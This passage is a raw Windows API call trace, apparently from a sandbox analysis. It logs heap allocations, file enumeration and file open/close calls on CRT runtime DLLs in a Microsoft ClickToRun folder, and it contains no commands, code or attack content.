HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0074.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0074.525] AreFileApisANSI () returned 1 [0074.525] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0074.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x5a6b8 [0074.525] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll") returned 92 [0074.525] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x5ac0)) returned 1 [0074.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0074.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0074.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0074.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.526] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x60c0, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="api-ms-win-crt-stdio-l1-1-0.dll", cAlternateFileName="APD1B7~1.DLL")) returned 1 [0074.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0074.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0074.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0074.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0074.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0074.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0074.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0074.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0074.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0074.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0074.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0074.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0074.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0074.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0074.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0074.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0074.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0074.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0074.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0074.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0074.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x5a6b8 [0074.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0074.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0074.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x80a30 [0074.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0074.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0074.527] AreFileApisANSI () returned 1 [0074.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 90 [0074.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0074.527] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.527] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0074.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0074.527] AreFileApisANSI () returned 1 [0074.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0074.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x5a6b8 [0074.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll") returned 90 [0074.527] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.527] GetFileType (hFile=0x42c) returned 0x1 [0074.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.527] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0074.528] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0074.528] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0074.528] CloseHandle (hObject=0x42c) returned 1 [0074.528] AreFileApisANSI () returned 1 [0074.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0074.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x5a6b8 [0074.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll") returned 90 [0074.528] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.528] GetFileType (hFile=0x42c) returned 0x1 [0074.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.528] CloseHandle (hObject=0x42c) returned 1 [0074.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0074.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0074.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0074.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0074.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0074.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0074.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0074.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0074.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0074.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0074.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0074.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0074.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0074.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0074.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0074.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0074.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0074.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0074.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0074.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0074.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0074.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0074.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0074.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0074.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0074.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0074.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0074.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0074.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0074.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0074.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0074.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0074.530] AreFileApisANSI () returned 1 [0074.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0074.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x5a6b8 [0074.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll") returned 90 [0074.530] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x60c0)) returned 1 [0074.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0074.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0074.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0074.530] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.530] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.530] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x60c0, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="api-ms-win-crt-string-l1-1-0.dll", cAlternateFileName="APBF0F~1.DLL")) returned 1 [0074.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0074.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69440 [0074.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0074.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0074.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0074.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0074.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0074.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0074.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69440 | out: hHeap=0x20000) returned 1 [0074.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0074.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0074.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0074.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0074.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0074.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0074.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0074.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0074.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0074.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0074.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0074.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0074.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x5a6b8 [0074.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0074.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0074.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x80a30 [0074.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.531] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.531] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.531] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.531] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0074.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0074.531] AreFileApisANSI () returned 1 [0074.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 91 [0074.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0074.531] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.531] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0074.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0074.532] AreFileApisANSI () returned 1 [0074.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0074.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x5a6b8 [0074.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=91 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll") returned 91 [0074.532] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.532] GetFileType (hFile=0x42c) returned 0x1 [0074.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.532] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0074.532] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0074.532] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0074.533] CloseHandle (hObject=0x42c) returned 1 [0074.533] AreFileApisANSI () returned 1 [0074.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0074.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x5a6b8 [0074.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=91 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll") returned 91 [0074.533] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft 